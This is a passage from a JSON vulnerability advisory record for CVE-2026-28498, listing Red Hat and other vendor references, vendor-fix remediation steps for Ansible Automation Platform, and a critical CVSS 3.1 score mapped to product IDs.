                    "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448182"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-26007"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-25639"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-69223"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-69873"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-1615"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-28802"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-29074"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-30827"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-30922"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/updates/classification/"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-25990"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6/html/release_notes/patch_releases"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6309.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde; redhat",
                    "url": "https://access.redhat.com/errata/RHSA-2026:6404"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://access.redhat.com/errata/RHSA-2026:6278"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://alas.aws.amazon.com/AL2/ALAS2-2026-3215.html"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://lists.suse.com/pipermail/sle-security-updates/2026-April/025088.html"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6404.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/errata/RHSA-2026:6497"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-13465"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-61726"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-61728"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-68121"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-68158"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-26996"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-27628"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-27904"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6497.json"
                }
            ],
            "remediations": [
                {
                    "category": "vendor_fix",
                    "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
                    "product_ids": [
                        "CSAFPID-5153949",
                        "CSAFPID-5973065"
                    ],
                    "restart_required": {
                        "category": "none"
                    },
                    "url": "https://access.redhat.com/errata/RHSA-2026:6309"
                },
                {
                    "category": "vendor_fix",
                    "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
                    "product_ids": [
                        "CSAFPID-5153949",
                        "CSAFPID-5973065"
                    ],
                    "restart_required": {
                        "category": "none"
                    },
                    "url": "https://access.redhat.com/errata/RHSA-2026:6404"
                },
                {
                    "category": "vendor_fix",
                    "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
                    "product_ids": [
                        "CSAFPID-5278082",
                        "CSAFPID-5986173"
                    ],
                    "restart_required": {
                        "category": "none"
                    },
                    "url": "https://access.redhat.com/errata/RHSA-2026:6497"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
                        "baseScore": 9.1,
                        "baseSeverity": "CRITICAL"
                    },
                    "products": [
                        "CSAFPID-1317174",
                        "CSAFPID-1317175",
                        "CSAFPID-1330296",
                        "CSAFPID-1384077",
                        "CSAFPID-1405217",
                        "CSAFPID-1405218",
                        "CSAFPID-1439279",
                        "CSAFPID-1439313",
                        "CSAFPID-1441200",
                        "CSAFPID-1455906",
                        "CSAFPID-1508257",
                        "CSAFPID-2831634",
                        "CSAFPID-5035448",
                        "CSAFPID-5068100",
                        "CSAFPID-5068103",
                        "CSAFPID-5068105",
                        "CSAFPID-5068108",
                        "CSAFPID-5068110",
                        "CSAFPID-5068114",
                        "CSAFPID-5068116",
                        "CSAFPID-5068119",
                        "CSAFPID-5068121",
                        "CSAFPID-5068123",
                        "CSAFPID-5068126",
                        "CSAFPID-5068128",
                        "CSAFPID-5068131",
                        "CSAFPID-5068134",
                        "CSAFPID-5155537",
                        "CSAFPID-5155538",
                        "CSAFPID-5222639",
                        "CSAFPID-5222767",
                        "CSAFPID-5222780",
                        "CSAFPID-5354794",
                        "CSAFPID-5355695",
                        "CSAFPID-5811359",
                        "CSAFPID-5830119",
                        "CSAFPID-5970752"
                    ]
                }
            ],
            "title": "CVE-2026-28498"
        }
    ]
}